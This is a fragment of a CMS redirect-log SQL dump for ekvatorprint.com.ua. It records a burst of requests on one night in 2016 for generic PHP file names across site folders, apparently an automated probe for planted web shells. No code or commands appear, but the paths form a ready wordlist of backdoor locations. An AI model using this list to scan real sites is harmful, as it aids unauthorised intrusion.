00:00:00',301),(2977,'http://ekvatorprint.com.ua/images/start.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:53:58','0000-00-00 00:00:00',301),(2978,'http://ekvatorprint.com.ua/components/start.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:56:18','0000-00-00 00:00:00',301),(2979,'http://ekvatorprint.com.ua/libraries/dump.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:56:23','0000-00-00 00:00:00',301),(2980,'http://ekvatorprint.com.ua/plugins/include.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:56:39','0000-00-00 00:00:00',301),(2981,'http://ekvatorprint.com.ua/images/proxy.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:56:58','0000-00-00 00:00:00',301),(2982,'http://ekvatorprint.com.ua/components/test.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:57:46','0000-00-00 00:00:00',301),(2983,'http://ekvatorprint.com.ua/includes/sql.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:58:28','0000-00-00 00:00:00',301),(2984,'http://ekvatorprint.com.ua/libraries/sql.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:58:53','0000-00-00 00:00:00',301),(2985,'http://ekvatorprint.com.ua/includes/article.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 03:59:32','0000-00-00 00:00:00',301),(2986,'http://ekvatorprint.com.ua/includes/functions.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:00:02','0000-00-00 00:00:00',301),(2987,'http://ekvatorprint.com.ua/images/utf.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:00:12','0000-00-00 00:00:00',301),(2988,'http://ekvatorprint.com.ua/libraries/object.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:00:27','0000-00-00 00:00:00',301),(2989,'http://ekvatorprint.com.ua/images/dirs.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:01:43','0000-00-00 00:00:00',301),(2990,'http://ekvatorprint.com.ua/plugins/functions.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:01:56','0000-00-00 00:00:00',301),(2991,'http://ekvatorprint.com.ua/modules/lib.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:02:11','0000-00-00 00:00:00',301),(2992,'http://ekvatorprint.com.ua/modules/option.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:02:14','0000-00-00 00:00:00',301),(2993,'http://ekvatorprint.com.ua/media/sql.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:02:19','0000-00-00 00:00:00',301),(2994,'http://ekvatorprint.com.ua/components/session.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:02:42','0000-00-00 00:00:00',301),(2995,'http://ekvatorprint.com.ua/media/gallery.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:03:33','0000-00-00 00:00:00',301),(2996,'http://ekvatorprint.com.ua/components/login.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:05:16','0000-00-00 00:00:00',301),(2997,'http://ekvatorprint.com.ua/plugins/template.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:05:30','0000-00-00 00:00:00',301),(2998,'http://ekvatorprint.com.ua/plugins/dump.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:06:23','0000-00-00 00:00:00',301),(2999,'http://ekvatorprint.com.ua/plugins/error.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:06:38','0000-00-00 00:00:00',301),(3000,'http://ekvatorprint.com.ua/administrator/proxy.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:06:53','0000-00-00 00:00:00',301),(3001,'http://ekvatorprint.com.ua/administrator/footer.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:07:36','0000-00-00 00:00:00',301),(3002,'http://ekvatorprint.com.ua/includes/admin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:09:05','0000-00-00 00:00:00',301),(3003,'http://ekvatorprint.com.ua/plugins/code.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:09:06','0000-00-00 00:00:00',301),(3004,'http://ekvatorprint.com.ua/libraries/css.php',NULL,'ekvatorprint.com.ua','',6,0,'2016-12-29 04:09:20','0000-00-00 00:00:00',301),(3005,'http://ekvatorprint.com.ua/plugins/sql.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:10:28','0000-00-00 00:00:00',301),(3006,'http://ekvatorprint.com.ua/templates/model.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:10:29','0000-00-00 00:00:00',301),(3007,'http://ekvatorprint.com.ua/modules/functions.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:10:30','0000-00-00 00:00:00',301),(3008,'http://ekvatorprint.com.ua/templates/config.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:12:46','0000-00-00 00:00:00',301),(3009,'http://ekvatorprint.com.ua/modules/test.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:13:22','0000-00-00 00:00:00',301),(3010,'http://ekvatorprint.com.ua/libraries/test.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:13:40','0000-00-00 00:00:00',301),(3011,'http://ekvatorprint.com.ua/administrator/header.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:13:47','0000-00-00 00:00:00',301),(3012,'http://ekvatorprint.com.ua/libraries/footer.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:15:05','0000-00-00 00:00:00',301),(3013,'http://ekvatorprint.com.ua/plugins/css.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:15:09','0000-00-00 00:00:00',301),(3014,'http://ekvatorprint.com.ua/administrator/dir.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:15:44','0000-00-00 00:00:00',301),(3015,'http://ekvatorprint.com.ua/modules/diff.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:17:40','0000-00-00 00:00:00',301),(3016,'http://ekvatorprint.com.ua/includes/files.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:18:12','0000-00-00 00:00:00',301),(3017,'http://ekvatorprint.com.ua/components/db.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-29 04:18:14','0000-00-00 00:00:00',301),(3018,'http://ekvatorprint.com.ua/media/defines.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:19:21','0000-00-00 00:00:00',301),(3019,'http://ekvatorprint.com.ua/components/proxy.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:20:07','0000-00-00 00:00:00',301),(3020,'http://ekvatorprint.com.ua/plugins/ajax.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:20:16','0000-00-00 00:00:00',301),(3021,'http://ekvatorprint.com.ua/includes/system.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:20:19','0000-00-00 00:00:00',301),(3022,'http://ekvatorprint.com.ua/plugins/dirs.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:21:41','0000-00-00 00:00:00',301),(3023,'http://ekvatorprint.com.ua/templates/utf.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:21:44','0000-00-00 00:00:00',301),(3024,'http://ekvatorprint.com.ua/modules/dirs.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:22:21','0000-00-00 00:00:00',301),(3025,'http://ekvatorprint.com.ua/includes/include.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:23:09','0000-00-00 00:00:00',301),(3026,'http://ekvatorprint.com.ua/plugins/cache.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:23:17','0000-00-00 00:00:00',301),(3027,'http://ekvatorprint.com.ua/components/admin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:23:31','0000-00-00 00:00:00',301),(3028,'http://ekvatorprint.com.ua/templates/login.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:24:03','0000-00-00 00:00:00',301),(3029,'http://ekvatorprint.com.ua/plugins/system.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:24:43','0000-00-00 00:00:00',301),(3030,'http://ekvatorprint.com.ua/components/ini.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:25:51','0000-00-00 00:00:00',301),(3031,'http://ekvatorprint.com.ua/media/dirs.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:25:54','0000-00-00 00:00:00',301),(3032,'http://ekvatorprint.com.ua/templates/file.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:26:36','0000-00-00 00:00:00',301),(3033,'http://ekvatorprint.com.ua/includes/file.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:27:02','0000-00-00 00:00:00',301),(3034,'http://ekvatorprint.com.ua/administrator/template.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:27:27','0000-00-00 00:00:00',301),(3035,'http://ekvatorprint.com.ua/components/search.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:27:52','0000-00-00 00:00:00',301),(3036,'http://ekvatorprint.com.ua/includes/session.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:27:56','0000-00-00 00:00:00',301),(3037,'http://ekvatorprint.com.ua/administrator/blog.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:28:02','0000-00-00 00:00:00',301),(3038,'http://ekvatorprint.com.ua/libraries/search.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:28:10','0000-00-00 00:00:00',301),(3039,'http://ekvatorprint.com.ua/modules/view.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:28:18','0000-00-00 00:00:00',301),(3040,'http://ekvatorprint.com.ua/administrator/db.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:28:25','0000-00-00 00:00:00',301),(3041,'http://ekvatorprint.com.ua/includes/xml.php',NULL,'ekvatorprint.com.ua','',6,0,'2016-12-29 04:28:39','0000-00-00 00:00:00',301),(3042,'http://ekvatorprint.com.ua/modules/title.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:28:43','0000-00-00 00:00:00',301),(3043,'http://ekvatorprint.com.ua/plugins/inc.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:29:04','0000-00-00 00:00:00',301),(3044,'http://ekvatorprint.com.ua/includes/dirs.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:29:55','0000-00-00 00:00:00',301),(3045,'http://ekvatorprint.com.ua/includes/object.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:29:59','0000-00-00 00:00:00',301),(3046,'http://ekvatorprint.com.ua/administrator/defines.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:31:06','0000-00-00 00:00:00',301),(3047,'http://ekvatorprint.com.ua/modules/javascript.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:31:45','0000-00-00 00:00:00',301),(3048,'http://ekvatorprint.com.ua/includes/option.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:31:53','0000-00-00 00:00:00',301),(3049,'http://ekvatorprint.com.ua/libraries/lib.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:31:54','0000-00-00 00:00:00',301),(3050,'http://ekvatorprint.com.ua/images/sql.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:32:31','0000-00-00 00:00:00',301),(3051,'http://ekvatorprint.com.ua/images/blog.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:32:32','0000-00-00 00:00:00',301),(3052,'http://ekvatorprint.com.ua/components/config.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:34:00','0000-00-00 00:00:00',301),(3053,'http://ekvatorprint.com.ua/images/header.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:34:03','0000-00-00 00:00:00',301),(3054,'http://ekvatorprint.com.ua/components/menu.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:34:05','0000-00-00 00:00:00',301),(3055,'http://ekvatorprint.com.ua/includes/user.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:34:22','0000-00-00 00:00:00',301),(3056,'http://ekvatorprint.com.ua/administrator/list.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:34:51','0000-00-00 00:00:00',301),(3057,'http://ekvatorprint.com.ua/templates/inc.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:35:18','0000-00-00 00:00:00',301),(3058,'http://ekvatorprint.com.ua/images/file.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:35:24','0000-00-00 00:00:00',301),(3059,'http://ekvatorprint.com.ua/media/login.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:35:27','0000-00-00 00:00:00',301),(3060,'http://ekvatorprint.com.ua/images/option.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:36:37','0000-00-00 00:00:00',301),(3061,'http://ekvatorprint.com.ua/plugins/blog.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:37:06','0000-00-00 00:00:00',301),(3062,'http://ekvatorprint.com.ua/images/alias.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:37:09','0000-00-00 00:00:00',301),(3063,'http://ekvatorprint.com.ua/media/options.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:37:18','0000-00-00 00:00:00',301),(3064,'http://ekvatorprint.com.ua/templates/dirs.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:37:36','0000-00-00 00:00:00',301),(3065,'http://ekvatorprint.com.ua/administrator/system.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:37:46','0000-00-00 00:00:00',301),(3066,'http://ekvatorprint.com.ua/components/code.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:38:41','0000-00-00 00:00:00',301),(3067,'http://ekvatorprint.com.ua/media/blog.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:38:50','0000-00-00 00:00:00',301),(3068,'http://ekvatorprint.com.ua/modules/template.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:38:52','0000-00-00 00:00:00',301),(3069,'http://ekvatorprint.com.ua/templates/javascript.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:39:22','0000-00-00 00:00:00',301),(3070,'http://ekvatorprint.com.ua/images/model.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:39:38','0000-00-00 00:00:00',301),(3071,'http://ekvatorprint.com.ua/components/themes.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:39:53','0000-00-00 00:00:00',301),(3072,'http://ekvatorprint.com.ua/libraries/option.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:40:24','0000-00-00 00:00:00',301),(3073,'http://ekvatorprint.com.ua/modules/info.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:42:57','0000-00-00 00:00:00',301),(3074,'http://ekvatorprint.com.ua/libraries/menu.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:43:05','0000-00-00 00:00:00',301),(3075,'http://ekvatorprint.com.ua/libraries/title.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:43:06','0000-00-00 00:00:00',301),(3076,'http://ekvatorprint.com.ua/includes/general.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:43:52','0000-00-00 00:00:00',301),(3077,'http://ekvatorprint.com.ua/media/file.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:44:12','0000-00-00 00:00:00',301),(3078,'http://ekvatorprint.com.ua/media/include.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:44:23','0000-00-00 00:00:00',301),(3079,'http://ekvatorprint.com.ua/images/user.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:45:19','0000-00-00 00:00:00',301),(3080,'http://ekvatorprint.com.ua/components/article.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:46:26','0000-00-00 00:00:00',301),(3081,'http://ekvatorprint.com.ua/plugins/title.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:46:31','0000-00-00 00:00:00',301),(3082,'http://ekvatorprint.com.ua/includes/help.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:46:54','0000-00-00 00:00:00',301),(3083,'http://ekvatorprint.com.ua/templates/alias.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:47:03','0000-00-00 00:00:00',301),(3084,'http://ekvatorprint.com.ua/components/error.php',NULL,'ekvatorprint.com.ua','',3,0,'2016-12-29 04:47:17','0000-00-00 00:00:00',301),(3085,'http://ekvatorprint.com.ua/modules/utf.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:48:00','0000-00-00 00:00:00',301),(3086,'http://ekvatorprint.com.ua/administrator/article.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:49:08','0000-00-00 00:00:00',301),(3087,'http://ekvatorprint.com.ua/media/proxy.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:49:11','0000-00-00 00:00:00',301),(3088,'http://ekvatorprint.com.ua/media/list.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:49:32','0000-00-00 00:00:00',301),(3089,'http://ekvatorprint.com.ua/components/list.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:49:35','0000-00-00 00:00:00',301),(3090,'http://ekvatorprint.com.ua/administrator/global.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:49:37','0000-00-00 00:00:00',301),(3091,'http://ekvatorprint.com.ua/components/defines.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:50:28','0000-00-00 00:00:00',301),(3092,'http://ekvatorprint.com.ua/components/user.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:50:32','0000-00-00 00:00:00',301),(3093,'http://ekvatorprint.com.ua/components/dir.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:50:35','0000-00-00 00:00:00',301),(3094,'http://ekvatorprint.com.ua/modules/list.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:51:12','0000-00-00 00:00:00',301),(3095,'http://ekvatorprint.com.ua/modules/db.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:51:52','0000-00-00 00:00:00',301),(3096,'http://ekvatorprint.com.ua/libraries/plugin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:52:09','0000-00-00 00:00:00',301),(3097,'http://ekvatorprint.com.ua/components/object.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:52:48','0000-00-00 00:00:00',301),(3098,'http://ekvatorprint.com.ua/modules/start.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:53:07','0000-00-00 00:00:00',301),(3099,'http://ekvatorprint.com.ua/components/info.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:53:35','0000-00-00 00:00:00',301),(3100,'http://ekvatorprint.com.ua/includes/info.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:53:52','0000-00-00 00:00:00',301),(3101,'http://ekvatorprint.com.ua/libraries/press.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:54:01','0000-00-00 00:00:00',301),(3102,'http://ekvatorprint.com.ua/modules/inc.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:54:32','0000-00-00 00:00:00',301),(3103,'http://ekvatorprint.com.ua/modules/xml.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:54:45','0000-00-00 00:00:00',301),(3104,'http://ekvatorprint.com.ua/plugins/admin.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-29 04:54:51','0000-00-00 00:00:00',301),(3105,'http://ekvatorprint.com.ua/images/options.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:54:53','0000-00-00 00:00:00',301),(3106,'http://ekvatorprint.com.ua/media/footer.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:55:11','0000-00-00 00:00:00',301),(3107,'http://ekvatorprint.com.ua/components/options.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:56:14','0000-00-00 00:00:00',301),(3108,'http://ekvatorprint.com.ua/libraries/javascript.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:57:14','0000-00-00 00:00:00',301),(3109,'http://ekvatorprint.com.ua/modules/themes.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:57:21','0000-00-00 00:00:00',301),(3110,'http://ekvatorprint.com.ua/images/menu.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:58:39','0000-00-00 00:00:00',301),(3111,'http://ekvatorprint.com.ua/media/general.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:58:50','0000-00-00 00:00:00',301),(3112,'http://ekvatorprint.com.ua/modules/help.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:59:10','0000-00-00 00:00:00',301),(3113,'http://ekvatorprint.com.ua/components/view.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:59:16','0000-00-00 00:00:00',301),(3114,'http://ekvatorprint.com.ua/includes/code.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 04:59:33','0000-00-00 00:00:00',301),(3115,'http://ekvatorprint.com.ua/modules/file.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:00:55','0000-00-00 00:00:00',301),(3116,'http://ekvatorprint.com.ua/media/cache.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:01:37','0000-00-00 00:00:00',301),(3117,'http://ekvatorprint.com.ua/templates/user.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:01:40','0000-00-00 00:00:00',301),(3118,'http://ekvatorprint.com.ua/plugins/config.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:01:48','0000-00-00 00:00:00',301),(3119,'http://ekvatorprint.com.ua/components/javascript.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:02:24','0000-00-00 00:00:00',301),(3120,'http://ekvatorprint.com.ua/templates/menu.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:03:24','0000-00-00 00:00:00',301),(3121,'http://ekvatorprint.com.ua/includes/alias.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:03:45','0000-00-00 00:00:00',301),(3122,'http://ekvatorprint.com.ua/templates/blog.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:03:47','0000-00-00 00:00:00',301),(3123,'http://ekvatorprint.com.ua/plugins/general.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:05:31','0000-00-00 00:00:00',301),(3124,'http://ekvatorprint.com.ua/components/file.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:05:39','0000-00-00 00:00:00',301),(3125,'http://ekvatorprint.com.ua/images/template.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:05:41','0000-00-00 00:00:00',301),(3126,'http://ekvatorprint.com.ua/media/xml.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:06:12','0000-00-00 00:00:00',301),(3127,'http://ekvatorprint.com.ua/media/utf.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:06:26','0000-00-00 00:00:00',301),(3128,'http://ekvatorprint.com.ua/plugins/model.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:06:50','0000-00-00 00:00:00',301),(3129,'http://ekvatorprint.com.ua/modules/options.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:07:14','0000-00-00 00:00:00',301),(3130,'http://ekvatorprint.com.ua/images/admin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:07:51','0000-00-00 00:00:00',301),(3131,'http://ekvatorprint.com.ua/administrator/general.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:07:58','0000-00-00 00:00:00',301),(3132,'http://ekvatorprint.com.ua/templates/info.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:08:00','0000-00-00 00:00:00',301),(3133,'http://ekvatorprint.com.ua/templates/system.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:08:12','0000-00-00 00:00:00',301),(3134,'http://ekvatorprint.com.ua/templates/css.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:09:04','0000-00-00 00:00:00',301),(3135,'http://ekvatorprint.com.ua/libraries/dirs.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:09:33','0000-00-00 00:00:00',301),(3136,'http://ekvatorprint.com.ua/templates/defines.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:10:09','0000-00-00 00:00:00',301),(3137,'http://ekvatorprint.com.ua/templates/search.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:10:42','0000-00-00 00:00:00',301),(3138,'http://ekvatorprint.com.ua/images/footer.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:10:52','0000-00-00 00:00:00',301),(3139,'http://ekvatorprint.com.ua/media/dir.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:12:30','0000-00-00 00:00:00',301),(3140,'http://ekvatorprint.com.ua/includes/gallery.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:12:59','0000-00-00 00:00:00',301),(3141,'http://ekvatorprint.com.ua/administrator/functions.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:13:10','0000-00-00 00:00:00',301),(3142,'http://ekvatorprint.com.ua/templates/files.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:14:16','0000-00-00 00:00:00',301),(3143,'http://ekvatorprint.com.ua/images/search.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:14:21','0000-00-00 00:00:00',301),(3144,'http://ekvatorprint.com.ua/administrator/stats.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:14:26','0000-00-00 00:00:00',301),(3145,'http://ekvatorprint.com.ua/media/help.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:14:44','0000-00-00 00:00:00',301),(3146,'http://ekvatorprint.com.ua/plugins/themes.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:15:05','0000-00-00 00:00:00',301),(3147,'http://ekvatorprint.com.ua/images/login.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:15:26','0000-00-00 00:00:00',301),(3148,'http://ekvatorprint.com.ua/modules/dir.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:15:39','0000-00-00 00:00:00',301),(3149,'http://ekvatorprint.com.ua/modules/files.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:16:43','0000-00-00 00:00:00',301),(3150,'http://ekvatorprint.com.ua/plugins/utf.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:17:10','0000-00-00 00:00:00',301),(3151,'http://ekvatorprint.com.ua/libraries/files.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:17:36','0000-00-00 00:00:00',301),(3152,'http://ekvatorprint.com.ua/modules/session.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:17:57','0000-00-00 00:00:00',301),(3153,'http://ekvatorprint.com.ua/modules/ajax.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:18:16','0000-00-00 00:00:00',301),(3154,'http://ekvatorprint.com.ua/templates/article.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:18:45','0000-00-00 00:00:00',301),(3155,'http://ekvatorprint.com.ua/templates/template.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:20:00','0000-00-00 00:00:00',301),(3156,'http://ekvatorprint.com.ua/media/alias.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:20:22','0000-00-00 00:00:00',301),(3157,'http://ekvatorprint.com.ua/media/press.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:21:09','0000-00-00 00:00:00',301),(3158,'http://ekvatorprint.com.ua/templates/sql.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:21:48','0000-00-00 00:00:00',301),(3159,'http://ekvatorprint.com.ua/includes/search.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:22:10','0000-00-00 00:00:00',301),(3160,'http://ekvatorprint.com.ua/media/model.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:22:19','0000-00-00 00:00:00',301),(3161,'http://ekvatorprint.com.ua/modules/article.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:22:22','0000-00-00 00:00:00',301),(3162,'http://ekvatorprint.com.ua/libraries/general.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:22:38','0000-00-00 00:00:00',301),(3163,'http://ekvatorprint.com.ua/administrator/files.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:22:46','0000-00-00 00:00:00',301),(3164,'http://ekvatorprint.com.ua/administrator/diff.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:23:17','0000-00-00 